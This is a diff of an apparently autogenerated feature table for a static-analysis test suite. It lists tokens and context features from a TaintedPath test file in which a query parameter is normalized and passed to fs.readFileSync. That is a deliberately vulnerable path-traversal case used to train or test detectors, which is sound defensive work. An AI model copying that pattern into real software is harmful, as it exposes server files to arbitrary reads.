autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -7642,11 +70243,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | (req, r ... // OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:51:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:36:30:38 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:41:30:43 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:41:30:43 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:30:41:30:43 | res | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:30:41:30:43 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:30:41:30:43 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path = ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:7:31:49 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:25:31:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:25:31:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:25:31:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:25:31:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:25:31:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:37 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:35:31:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:31:35:31:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:31:35:31:48 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:31:35:31:48 | req.query.path | calleeImports | path | @@ -7656,6 +70327,66 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:31:35:31:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:31:35:31:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:31:35:31:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:31:39:31:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:39:31:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:39:31:43 | query | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:39:31:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:39:31:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:31:45:31:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:31:45:31:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:31:45:31:48 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:31:45:31:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:31:45:31:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:16 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:16 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:16 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:16 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:16 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:27 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:27 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:27 | pathMod ... bsolute | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:27 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:27 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:33:7:33:33 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:33:18:33:27 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:33:18:33:27 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:33:18:33:27 | isAbsolute | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:33:18:33:27 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:33:18:33:27 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:36:3:36:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:36:6:36:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:36:6:36:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:36:6:36:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:36:6:36:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:36:6:36:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:36:19:36:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:36:19:36:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:36:19:36:22 | path | calleeImports | fs | @@ -7665,6 +70396,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:36:19:36:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:36:19:36:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:36:19:36:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:38:7:38:27 | !path.s ... th(".") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:38:7:38:27 | !path.s ... th(".") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:38:7:38:27 | !path.s ... th(".") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:38:7:38:27 | !path.s ... th(".") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:38:7:38:27 | !path.s ... th(".") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:11 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:22 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:22 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:22 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:22 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:22 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | exceptional return of path.startsWith(".") | 